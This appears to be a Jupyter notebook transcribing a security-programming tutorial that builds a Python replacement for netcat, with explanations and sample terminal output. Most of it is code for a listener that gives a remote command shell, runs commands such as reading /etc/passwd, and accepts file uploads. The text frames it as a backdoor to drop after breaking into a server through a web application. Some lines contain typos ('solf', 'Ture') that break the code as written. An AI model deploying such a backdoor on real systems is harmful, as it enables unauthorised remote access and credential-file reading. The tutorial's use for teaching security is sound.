<a href="https://colab.research.google.com/github/damianiRiccardo90/BHP/blob/master/C1-Basic_Networking_Tools/Netcat.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# *__Replacing Netcat__*

Netcat is the utility knife of networking, so it's no surprise that shrewd systems administrators remove it from their systems. Such a useful tool would be quite an asset if an attacker managed to find a way in. With it, you can read and write data across the network, meaning you can use it to execute remote commands, pass files back and forth, or even open a remote shell. On more than one occasion, we're run into servers that don't have netcat installed but do have Python. In these cases, it's useful to create a simple network client and server that you can use to push files, or a listener that gives you command line access. If you've broken in through a web application, it's definitely worth dropping a Python callback to give you secondary access without having to first burn one of your trojans or backdoors. Creating a tool like this is also a great Python exercise, so let's get started.

In [ ]:
import argparse
import socket
import shlex
import subprocess
import sys
import textwrap
import threading

def execute(cmd):
    cmd = cmd.strip()
    if not cmd:
        return
    output = subprocess.check_output(shlex.split(cmd), stderr=subprocess.STDOUT) #[1]

    return output.decode()

Here, we import all of our necessary libraries and set up the __execute()__ function, which receives a command, runs it, and returns the output as a string. This function contains a new library we haven't covered yet: The __subprocess__ library. This library provides a powerful process creation interface that gives you a number of ways to interact with client programs. In this case __[1]__, we're using its __check_output()__ method, which runs a command on the local operating system and then returns the output from that command.

Now let's create our main block responsible for handling command line arguments and calling the rest of our functions:

In [ ]:
if __name__ == '__main__':
    parser = argparse.ArgumentParser( #[1]
        description='BHP Net Tool',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=textwrap.dedent('''Example:
            netcat.py -t 192.168.1.108 -p 5555 -l -c # command shell
            netcat.py -t 192.168.1.108 -p 5555 -l -u=mytest.txt # upload to file
            netcat.py -t 192.168.1.108 -p 5555 -l -e=\"cat /etc/passwd\" # execute command
            echo 'ABC' | ./netcat.py -t 192.168.1.108 -p 135 # echo text to server port 135
            netcat.py -t 192.168.1.108 -p 5555 # connect to server
        ''')) #[2]
    parser.add_argument('-c', '--command', action='store_true', help='command shell') #[3]
    parser.add_argument('-e', '--execute', help='execute specified command')
    parser.add_argument('-l', '--listen', action='store_true', help='listen')
    parser.add_argument('-p', '--port', type=int, default=5555, help='specified port')
    parser.add_argument('-t', '--target', default='192.168.1.203', help='specified IP')
    parser.add_argument('-u', '--upload', help='upload file')
    args = parser.parse_args()
    if args.listen:
        buffer = ''
    else:
        buffer = sys.stdin.read()

    nc = NetCat(args, buffer.encode())
    nc.run()

We use the __argparse__ module from the standard library to create a command line interface __[1]__. We'll provide arguments so it can be invoked to upload a file, execute a command, or start a command shell.
We provide example usage that the program will display when the user invokes it with __--help__ __[2]__ and add six arguments that specify how we want the program to behave __[3]__. The __-c__ argument sets up an interative shell, the __-e__ argument executes one specific command, the __-l__ argument indicates that a listener should be set up, the __-p__ argument specifies the port on which to communicate, the __-t__ argument specifies the target __IP__, and the __-u__ argument specifies the name of a file to upload. Both the sender and receiver can use this program, so the arguments define whether it's invoked to send or listen. The __-c__, __-e__, and __-u__ arguments imply the __-l__ argument, because those arguments apply to only the listener side of the communication. The sender side makes the connection to the listener, and so it needs only the __-t__ and __-p__ arguments to define the target listener.
If we're setting it up as a listener __[4]__, we invoke the __NetCat__ object with an empty buffer string. Otherwise, we send the buffer contenct from __stdin__. Finally, we call the __run()__ method to start it up.

Now let's start putting in the plumbing for some of these features, beginning with our client code. Add the following code above the main block:

In [ ]:
class NetCat:
    def __init__(self, args, buffer=None): #[1]
        self.args = args
        self.buffer = buffer
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #[2]
        solf.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

    def run(self):
        if self.args.listen:
            self.listen() #[3]
        else:
            self.send() #[4]

We initialise the __NetCat__ object with the arguments from the command line and the buffer __[1]__ and then create the socket object __[2]__.
The __run()__ method, which is the entry point for managing the __NetCat__ object, is pretty simple: It delegates execution to two methods. If we're setting up a listener, we call the __listen()__ method __[3]__. Otherwise, we call the __send()__ method __[4]__.

Now let's write that __send()__ method:

In [ ]:
class NetCat(NetCat):
    def send(self):
        self.socket.connect((self.args.target, self.args.port)) #[1]
        if self.buffer:
            self.socket.send(self.buffer)

        try: #[2]
            while True: #[3]
                recv_len = 1
                response = ''
                while recv_len:
                    data = self.socket.recv(4096)
                    recv_len = len(data)
                    response += data.decode()
                    if recv_len < 4096:
                        break #[4]
                if response:
                    print(response)
                    buffer = input('> ')
                    buffer += '\n'
                    self.socket.send(buffer.encode()) #[5]
        except KeyboardInterrupt: #[6]
            print('User terminated.')
            self.socket.close()
            sys.exit()

We connect to the target and port __[1]__, and if we have a buffer, we send that to the target first. Then we set up a __try/catch__ block so we can manually close the connection with __CTRL-C__ __[2]__. Next, we start a loop __[3]__ to receive data from the target. If there is no more data, we break out of the loop __[4]__. Otherwise, we print the response data and pause to get interactive input, send that input __[5]__, and continue the loop.
The loop will continue until the __KeyboardInterrupt__ occurs (__CTRL-C__) __[6]__, which will close the socket.

Now let's write the method that executes when the program runs as a listener:

In [ ]:
class NetCat(NetCat):
    def listen(self):
        self.socket.bind((self.args.target, self.args.port)) #[1]
        self.socket.listen(5)
        while True: #[2]
            client_socket, _ = self.socket.accept()
            client_thread = threading.Thread( #[3]
                target=self.handle, args=(client_socket,)
            )
            client_thread.start()

The __listen()__ method binds to the target and port __[1]__ and starts listening in a loop __[2]__, passing the connected socket to the __handle()__ method __[3]__.

Now let's implement the logic to perform file uploads, execute commands, and create an interactive shell. The program can perform these tasks when operating as a listener.

In [ ]:
class NetCat(NetCat):
    def handle(self, client_socket):
        if self.args.execute: #[1]
            output = execute(self.args.execute)
            client_socket.send(output.encode())

        elif self.args.upload: #[2]
            file_buffer = b''
            while Ture:
                data = client_socket.recv(4096)
                if data:
                    file_buffer += data
                else:
                    break
            
            with open(self.args.upload, 'wb') as f:
                f.write(file_buffer)
                message = f'Saved file {self.args.upload}'
                client_socket.send(message.encode())
        
        elif self.args.command: #[3]
            cmd_buffer = b''
            while True:
                try:
                    client_socket.send(b'BHP: #> ')
                    while '\n' not in cmd_buffer.decode():
                        cmd_buffer += client_socket.recv(64)
                    response = execute(cmd_buffer.decode())
                    if response:
                        client_socket.send(response.encode())
                    cmd_buffer = b''
                except Exception as e:
                    print(f'Server killed {e}')
                    self.socket.close()
                    sys.exit()

The __handle()__ method executes the task corresponding to the command line argument it receives: Execute a command, upload a file, or start a shell. If a command should be executed __[1]__, the __handle()__ method passes that command to the __execute()__ function and sends the output back on the socket. If a file should be uploaded __[2]__, we set up a loop to listen for content on the listening socket and receive data until there's no more data coming in. Then we write that accumulated content to the specified file. Finally, if a shell is to be created __[3]__, we set up a loop, send a prompt to the sender, and wait for command string to come back. We then execute the command by using the __execute()__ function and return the output of the command to the sender. You'll notice that the shell scans for a newline character to determine when to process a command, which makes it netcat friendly. That is, you can use this program on the listener side and use necat iself on the sender side. However, if you're conjuring up a Python client to speak to it, remember to add the newline character. In the __send()__ method, you can see we add the newline character after we get input from the console.

# *__Kicking the tires__*

Now let's play around with it a bit to see some output. In one terminal or __cmd.exe__ shell, run the script with the __--help__ argument:
```
$ python netcat.py --help
usage: netcat.py [-h] [-c] [-e EXECUTE] [-l] [-p PORT] [-t TARGET] [-u UPLOAD]

BHP Net Tool

optional arguments:
    -h, --help                        show this help message and exit
    -c, --command                     initialize command shell
    -e, EXECUTE, --execute EXECUTE    execute specified command
    -l, --listen                      listen
    -p PORT, --port PORT              specified port
    -t TARGET, --target TARGET        specified IP
    -u UPLOAD, --upload UPLOAD        upload file

Example:
    netcat.py -t 192.168.1.108 -p 5555 -l -c # command shell
    netcat.py -t 192.168.1.108 -p 5555 -l -u=mytest.txt # upload to file
    netcat.py -t 192.168.1.108 -p 5555 -l -e=\"cat /etc/passwd\" # execute command
    echo 'ABC' | ./netcat.py -t 192.168.1.108 -p 135 # echo text to server port 135
    netcat.py -t 192.168.1.108 -p 5555 # connect to server
```

Now, on your Kali machine, set up a listener using its own __IP__ and port __5555__ to provide a command shell:
```
$ python netcat.py -t 192.168.1.203 -p 5555 -l -c
```

Now fire up another terminal on your local machine and run the script in client mode. Remember that the script reads from __stdin__ and will do so until it receives the end-of-file (__EOF__) marker. To send __EOD__, press __CTRL-D__ on your keyboard:
```
% python netcat.py -t 192.168.1.203 -p 5555
CTRL-D
<BHP:#> ls -la
total 23497
drwxr-xr-x 1 502 dialout        608 May 16 17:12 .
drwxr-xr-x 1 502 dialout        512 Mar 29 11:23 ..
-rw-r--r-- 1 502 dialout       8795 May  6 10:10 mytest.png
-rw-r--r-- 1 502 dialout      14610 May 11 09:06 mytest.sh
-rw-r--r-- 1 502 dialout       8795 May  6 10:10 mytest.txt
-rw-r--r-- 1 502 dialout       4408 May 11 08:55 netcat.py
<BHP: #> uname -a
Linux kali 5.3.0-kali3-amd64 #1 SMP Debian 5.3.15-1kali1 (2019-12-09 x86_64 GNO/Linux)
```

You can see that we receive our custom command shell. Because we're on a Unix host, we can run local commands and receive output in return, as if we had logged in via __SSH__ or were on the box locally. We can perform the same setup on the Kali machine but have it execute a single command using the __-e__ switch:
```
$ python netcat.py -t 192.168.1.203 -p 5555 -l -e="cat /etc/passwd"
```

Now, when we connect to Kali from the local machine, we're rewarded with the output from the command:
```
% python necat.py -t 192.168.1.203 -p 5555

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
```

We could also use netcat on the local machine:
```
% nc 192.168.1.203 5555
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
```

Finally, we could use the client to send out requests the good, old-fashioned way:
```
$ echo -ne "GET / HTTP/1.1\r\nHost: reachtim.com\r\n\r\n" | python ./netcat.py -t reachtim.com -p 80

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Mon, 18 May 2020 12:46:30 GMT
Content-Type: text/html; charset=iso-8859-1
Content_Length: 229
Connection: keep-alive
Location: https://reachtim.com/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
\<html><head>
<title>301 Moved Permanently</title>
<</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://reachtim.com/">here</a>.</p>
</body></html\>
```

There you go! While not a __super technical technique__, it's a good foundation for hacking together some client and server sockets in Python and using them for evil. Of course, this program covers only the fundamentals; use your imagination to expand or improve it. Next, let's build a __TCP__ proxy, which is useful in any number of offensive scenarios.